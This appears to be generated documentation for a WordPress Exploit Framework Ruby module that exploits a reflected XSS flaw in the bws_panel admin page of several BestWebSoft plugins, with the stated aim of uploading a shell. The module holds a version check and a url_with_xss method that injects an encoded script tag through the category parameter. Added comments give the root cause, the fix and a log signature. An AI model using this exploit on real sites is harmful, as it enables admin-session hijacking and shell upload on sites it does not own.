class Wpxf::Exploit::BwsPanelReflectedXssShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 6
# Sets up the module and records its descriptive metadata: display name,
# credits, advisory references and disclosure date.
#
# The references are the handles a defender needs to look the issue up:
# WPVDB entry 8796 and the DefenseCode advisory PDF linked below.
def initialize
  super

  credits = [
    'DefenseCode', # Discovery
    'rastating'    # WPXF module
  ]

  advisories = [
    ['WPVDB', '8796'],
    ['URL', 'http://www.defensecode.com/advisories/DC-2017-02-014_50_WordPress_plugins_by_BestWebSoft_Advisory.pdf']
  ]

  update_info(
    name: 'Multiple BestWebSoft Plugins Reflected XSS Shell Upload',
    author: credits,
    references: advisories,
    date: 'Apr 12 2017'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 23
# Reports whether the target looks affected.
#
# Returns :unknown when no plugin name is configured, :vulnerable when no
# fixed version is recorded, and otherwise the result of comparing the
# plugin's readme version against the fixed version.
#
# NOTE(review): the :vulnerable answer for a missing fixed version is an
# inference (no patched release is known to this module), not the result of
# probing the site. Treat it as "assume affected", not as confirmation.
def check
  if plugin_name.nil?
    :unknown
  elsif fixed_version.nil?
    :vulnerable
  else
    check_plugin_version_from_readme(plugin_name, fixed_version)
  end
end
fixed_version()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 34
# Version of the plugin in which the issue was fixed.
#
# This class returns nil, which makes #check report :vulnerable whenever a
# plugin name is set. Presumably per-plugin subclasses override this with
# the patched release number; that is not shown here.
def fixed_version
  nil
end
plugin_name()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 30
# Name of the affected plugin, as passed to the readme version check.
#
# This class returns nil, so #check answers :unknown unless the method is
# overridden. Presumably each affected BestWebSoft plugin supplies its own
# value in a subclass; confirm against the subclasses.
def plugin_name
  nil
end
url_with_xss()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 42
# Builds the admin URL whose `category` query parameter carries the
# reflected script.
#
# The value starts with a URL-encoded `">` and ends with `<"`, so the
# parameter is presumably echoed unescaped inside a quoted attribute of the
# `bws_panel` admin page (see the referenced advisory to confirm).
#
# Defensive notes:
# * Root cause is missing output escaping of `category`; the fix is to
#   escape it on output and update the affected plugins.
# * In access logs, a request to wp-admin/admin.php with `page=bws_panel`
#   and a `category` value containing `%3Cscript` matches this URL shape.
def url_with_xss
  admin_page = vulnerable_url
  script_body = xss_url_and_ascii_encoded_include_script

  "#{admin_page}?page=bws_panel&category=%22%3E%3Cscript%3E#{script_body}%3C%2Fscript%3E%3C%22"
end
vulnerable_url()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 38
# Address of the WordPress admin entry point (`admin.php`) that serves the
# affected `bws_panel` page, built from the target's admin base URL.
def vulnerable_url
  admin_base = wordpress_url_admin
  normalize_uri(admin_base, 'admin.php')
end